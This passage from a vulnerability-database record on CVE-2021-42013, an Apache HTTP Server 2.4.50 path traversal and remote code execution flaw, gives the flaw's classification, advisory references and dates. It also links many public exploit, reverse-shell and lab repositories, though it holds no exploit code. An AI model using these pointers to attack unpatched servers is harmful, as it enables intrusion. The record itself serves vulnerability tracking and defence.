"title": "Apache 2.4.50 - Path Traversal or Remote Code Execution\nVulnerable Configurations in httpd.conf\nLab for CVE-2021-42013\nUsage cve-2021-42013.py",
"trust": 0.2,
"url": "https://github.com/walnutsecurity/cve-2021-42013 "
},
{
"title": "Red Hat: CVE-2021-42013",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-42013"
},
{
"title": "Arch Linux Advisories: [ASA-202110-1] apache: directory traversal",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=asa-202110-1"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-42013 log"
},
{
"title": "Cisco: Apache HTTP Server Vulnerabilties: October 2021",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-apache-httpd-pathtrv-lazg68cz"
},
{
"title": "Amazon Linux AMI: ALAS-2021-1543",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1543"
},
{
"title": "Amazon Linux 2: ALAS2-2021-1716",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1716"
},
{
"title": "Apache 2.4.50 - Path Traversal or Remote Code Execution\nVulnerable Configurations in httpd.conf\nLab for CVE-2021-42013\nUsage cve-2021-42013.py",
"trust": 0.1,
"url": "https://github.com/mightysai1997/cve-2021-42013.get "
},
{
"title": "Usage cve-2021-42013.py",
"trust": 0.1,
"url": "https://github.com/imhunterand/cve-2021-42013 "
},
{
"title": "CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/viliuspovilaika/cve-2021-42013 "
},
{
"title": "Apache 2.4.50 - Path Traversal or Remote Code Execution\nVulnerable Configurations in httpd.conf\nLab for CVE-2021-42013\nUsage cve-2021-42013.py",
"trust": 0.1,
"url": "https://github.com/mightysai1997/cve-2021-42013 "
},
{
"title": "Lab for CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/turzum/ps-lab-cve-2021-42013 "
},
{
"title": "CVE-2021-42013 Vulnerable service",
"trust": 0.1,
"url": "https://github.com/12345qwert123456/cve-2021-42013 "
},
{
"title": "CVE-2021-42013 - Apache HTTP Server 2.4.50\nCara Menjalankan Lab CVE-2021-42013-Path Traversal\nCara Menjalankan Lab CVE-2021-42013-RCE",
"trust": 0.1,
"url": "https://github.com/bincangsiber/cve-2021-42013 "
},
{
"title": "CVE-2021-42013-LAB",
"trust": 0.1,
"url": "https://github.com/jas9reet/cve-2021-42013-lab "
},
{
"title": "CVE-2021-42013 - Apache HTTP Server 2.4.50\nCara Menjalankan Lab CVE-2021-42013-Path Traversal\nCara Menjalankan Lab CVE-2021-42013-RCE",
"trust": 0.1,
"url": "https://github.com/layarkacasiber/cve-2021-42013 "
},
{
"title": "Advent-of-Cyber-3-2021-",
"trust": 0.1,
"url": "https://github.com/ibrahimetecicek/advent-of-cyber-3-2021- "
},
{
"title": "CVE-2021-42013-ApacheRCE",
"trust": 0.1,
"url": "https://github.com/xmohamed0/cve-2021-42013-apacherce "
},
{
"title": "Dockerisation d\u0027une Vuln\u00c3\u00a9rabilit\u00c3\u00a9 : cve-2021-42013",
"trust": 0.1,
"url": "https://github.com/cybfar/cve-2021-42013-httpd "
},
{
"title": "CVE-2021-42013\nApache 2.4.50 vulnerability",
"trust": 0.1,
"url": "https://github.com/hamesawian/cve-2021-42013 "
},
{
"title": "cve-2021-42013",
"trust": 0.1,
"url": "https://github.com/mightysai1997/cve-2021-42013l "
},
{
"title": "cve-2021-42013",
"trust": 0.1,
"url": "https://github.com/vulnmachines/cve-2021-42013 "
},
{
"title": "Read Me",
"trust": 0.1,
"url": "https://github.com/mallaichte/efed-management-system "
},
{
"title": "Container-Security (Docker \u0026 Kubernetes)",
"trust": 0.1,
"url": "https://github.com/vamckis/container-security "
},
{
"title": "CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/theykillmeslowly/cve-2021-42013 "
},
{
"title": "Project Title",
"trust": 0.1,
"url": "https://github.com/mightysai1997/-apache_2.4.50 "
},
{
"title": "CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/cryst4lliz3/cve-2021-42013 "
},
{
"title": "CVE-2021-42013_Reverse-Shell",
"trust": 0.1,
"url": "https://github.com/thelastvvv/cve-2021-42013_reverse-shell "
},
{
"title": "Apache HTTP Server 2.4.50 LFI \u0026 RCE",
"trust": 0.1,
"url": "https://github.com/hadrian3689/apache_2.4.50 "
},
{
"title": "CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/thelastvvv/cve-2021-42013 "
},
{
"title": "Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\nCredits: Ash Daulton \u0026 cPanel Security Team\nDate: 24/07/2021\nExploit Author: TheLastVvV.com\nVendor Homepage: https://apache.org/\nVersion: Apache 2.4.50 with CGI enable\nTested on : Debian 5.10.28\nCVE : CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/luke-cmd/sharecode "
},
{
"title": "comp.sec.300.2021.2022",
"trust": 0.1,
"url": "https://github.com/codinglikejesus/comp.sec.300.2021.2022 "
},
{
"title": "apache-exploit-CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/andrea-mattioli/apache-exploit-cve-2021-42013 "
},
{
"title": "https://github.com/ralvares/security-demos",
"trust": 0.1,
"url": "https://github.com/ralvares/security-demos "
},
{
"title": "CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/rnsss/cve-2021-42013 "
},
{
"title": "CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/khidhir-ibrahim/cve-2021-42013 "
},
{
"title": "cve-2021-42013",
"trust": 0.1,
"url": "https://github.com/rubikcuv5/cve-2021-42013 "
},
{
"title": "CVE-2021-42013",
"trust": 0.1,
"url": "https://github.com/twseptian/cve-2021-42013-docker-lab "
},
{
"title": "https://github.com/asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP",
"trust": 0.1,
"url": "https://github.com/asaotomo/cve-2021-42013-apache-rce-poc-exp "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"db": "VULMON",
"id": "CVE-2021-42013"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
},
{
"problemtype": "Path traversal (CWE-22) [IPA evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/164501/apache-http-server-2.4.50-path-traversal-code-execution.html"
},
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/165089/apache-http-server-2.4.50-cve-2021-42013-exploitation.html"
},
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/167397/apache-2.4.50-remote-code-execution.html"
},
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/164941/apache-http-server-2.4.50-remote-code-execution.html"
},
{
"trust": 2.2,
"url": "http://packetstormsecurity.com/files/164629/apache-2.4.49-2.4.50-traversal-remote-code-execution.html"
},
{
"trust": 2.2,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.7,
"url": "https://security.gentoo.org/glsa/202208-20"
},
{
"trust": 1.6,
"url": "https://httpd.apache.org/security/vulnerabilities_24.html"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20211029-0009/"
},
{
"trust": 1.6,
"url": "https://www.oracle.com/security-alerts/cpujan2022.html"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/16/1"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/15/3"
},
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/164609/apache-http-server-2.4.50-remote-code-execution.html"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/08/4"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/08/3"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/08/2"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/09/1"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/08/1"
},
{
"trust": 1.6,
"url": "https://www.povilaika.com/apache-2-4-50-exploit/"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/08/6"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/07/6"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/08/5"
},
{
"trust": 1.6,
"url": "http://jvn.jp/en/jp/jvn51106450/index.html"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2021/10/11/4"
},
{
"trust": 1.2,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3%40%3ccvs.httpd.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837%40%3cannounce.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb%40%3cusers.httpd.apache.org%3e"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/"
},
{
"trust": 1.0,
"url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-apache-httpd-pathtrv-lazg68cz"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42013"
},
{
"trust": 0.8,
"url": "https://jvn.jp/jp/jvn51106450/index.html"
},
{
"trust": 0.8,
"url": "https://www.ipa.go.jp/security/ciadr/vul/alert20211006.html"
},
{
"trust": 0.8,
"url": "https://www.jpcert.or.jp/at/2021/at210043.html"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r7c795cd45a3384d4d27e57618a215b0ed19cb6ca8eb070061ad5d837@%3cannounce.apache.org%3e"
},
{
"trust": 0.6,
"url": "httpd.apache.org%3e"
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/r17a4c6ce9aff662efd9459e9d1850ab4a611cb23392fc68264c72cb3@%3ccvs."
},
{
"trust": 0.6,
"url": "https://lists.apache.org/thread.html/rb5b0e46f179f60b0c70204656bc52fcb558e961cb4d06a971e9e3efb@%3cusers."
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rmiiefinl6fuiopd2a3m5xc6dh45y3cc/"
},
{
"trust": 0.6,
"url": "httpd.apache.org/security/vulnerabilities_24.html"
},
{
"trust": 0.6,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ws5rvhoiirecg65zbtzy7iejvwqsqpg3/"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2021-42013"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021100131"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021100718"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50406"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3348"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50446"
},
{
"trust": 0.6,
"url": "https://www.exploit-db.com/exploits/50512"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042513"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021101513"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/apache-http-server-2-4-49-50-directory-traversal-via-alias-like-directives-36614"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021100802"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2021110108"
},
{
"trust": 0.6,
"url": "httpd-pathtrv-lazg68cz"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168072/gentoo-linux-security-advisory-202208-20.html"
},
{
"trust": 0.1,
"url": "https://lsass.io"
},
{
"trust": 0.1,
"url": "https://apache.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
},
{
"trust": 0.1,
"url": "https://bugs.gentoo.org."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-29404"
},
{
"trust": 0.1,
"url": "https://creativecommons.org/licenses/by-sa/2.5"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44790"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41773"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-41524"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44224"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22719"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-40438"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-30556"
},
{
"trust": 0.1,
"url": "https://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-36160"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-34798"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-39275"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-22720"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33193"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "PACKETSTORM",
"id": "165089"
},
{
"db": "PACKETSTORM",
"id": "164501"
},
{
"db": "PACKETSTORM",
"id": "168072"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
},
{
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"db": "VULMON",
"id": "CVE-2021-42013"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"db": "PACKETSTORM",
"id": "165089"
},
{
"db": "PACKETSTORM",
"id": "164501"
},
{
"db": "PACKETSTORM",
"id": "168072"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
},
{
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-01-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"date": "2021-10-07T00:00:00",
"db": "VULMON",
"id": "CVE-2021-42013"
},
{
"date": "2021-10-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"date": "2021-11-29T18:03:21",
"db": "PACKETSTORM",
"id": "165089"
},
{
"date": "2021-10-13T15:03:24",
"db": "PACKETSTORM",
"id": "164501"
},
{
"date": "2022-08-15T16:02:48",
"db": "PACKETSTORM",
"id": "168072"
},
{
"date": "2021-10-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-413"
},
{
"date": "2021-10-07T16:15:09.270000",
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2022-03220"
},
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2021-42013"
},
{
"date": "2023-12-12T07:40:00",
"db": "JVNDB",
"id": "JVNDB-2021-000090"
},
{
"date": "2022-08-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202110-413"
},
{
"date": "2023-11-07T03:39:05.670000",
"db": "NVD",
"id": "CVE-2021-42013"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165089"
},
{
"db": "PACKETSTORM",
"id": "168072"
},
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
}
],
"trust": 0.8
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache\u00a0HTTP\u00a0Server\u00a0 directory traversal vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-000090"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202110-413"
}
],
"trust": 0.6
}
}
Loading...